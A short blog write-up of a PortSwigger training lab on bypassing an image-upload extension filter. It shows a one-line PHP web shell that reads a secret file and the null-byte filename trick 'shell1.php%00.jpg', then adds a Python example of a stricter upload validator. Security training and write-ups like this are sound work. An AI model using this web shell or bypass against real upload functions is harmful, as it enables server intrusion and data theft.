apsyleg · 1 min read
#portswigger #file-upload #rce #null-byte #web-security
Web Shell Upload via Obfuscated File Extension
Lab
Web shell upload via obfuscated file extension · Practitioner
Solution
Given
This lab contains a vulnerable image upload function. Certain file extensions
are blacklisted, but this defense can be bypassed using a classic obfuscation
technique.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the
contents of the file /home/carlos/secret. Submit this secret using the button
provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Analysis and recon
Shell is the same:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Drop shell.php:
Sorry, only JPG & PNG files are allowed
Sorry, there was an error uploading your file.
So we have to convince the server it's a JPG or PNG. Let's go through the options.
- shell.php.jpg: uploaded, but it's served as an image, didn't work.
- The null byte trick did:
Content-Disposition: form-data; name="avatar"; filename="shell1.php%00.jpg"
Content-Type: application/x-php
Re4kTtunnIZsPQSV4FFhRmyNL6FO0gos
Lab solved!
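Why the check passed, and what a stricter one looks like, as an added example that is not part of the original write-up or the lab's own code. It models the mismatch in Python: the validator reads the extension from the raw filename, while a later layer decodes it and stops at the NUL byte. The function names, the `ALLOWED_EXTENSIONS` set and the truncation model are assumptions for illustration.

```python
import os
import secrets
from urllib.parse import unquote

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png"}  # assumption: images only
SAMPLE = "shell1.php%00.jpg"  # filename from the request above


def naive_check(filename: str) -> bool:
    """Weak check: trusts whatever follows the last dot of the raw name."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXTENSIONS


def name_after_nul_truncation(filename: str) -> str:
    """Model (assumption) of a later layer that URL-decodes the name and
    treats it as a C string, which ends at the first NUL byte."""
    return unquote(filename).split("\x00", 1)[0]


def safe_stored_name(filename: str) -> str:
    """Decode until stable, reject control characters, allowlist the
    extension, and never reuse the client-supplied stem on disk."""
    decoded = filename
    for _ in range(5):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    else:
        raise ValueError("too many encoding layers")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        raise ValueError("control character in filename")
    base = os.path.basename(decoded.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    print(naive_check(SAMPLE))                # validator sees ".jpg"
    print(name_after_nul_truncation(SAMPLE))  # storage layer sees "shell1.php"
    try:
        safe_stored_name(SAMPLE)
    except ValueError as err:
        print("rejected:", err)
```

Storing uploads under a server-generated name, outside any directory where the web server executes scripts, removes the dependence on the client-supplied filename altogether.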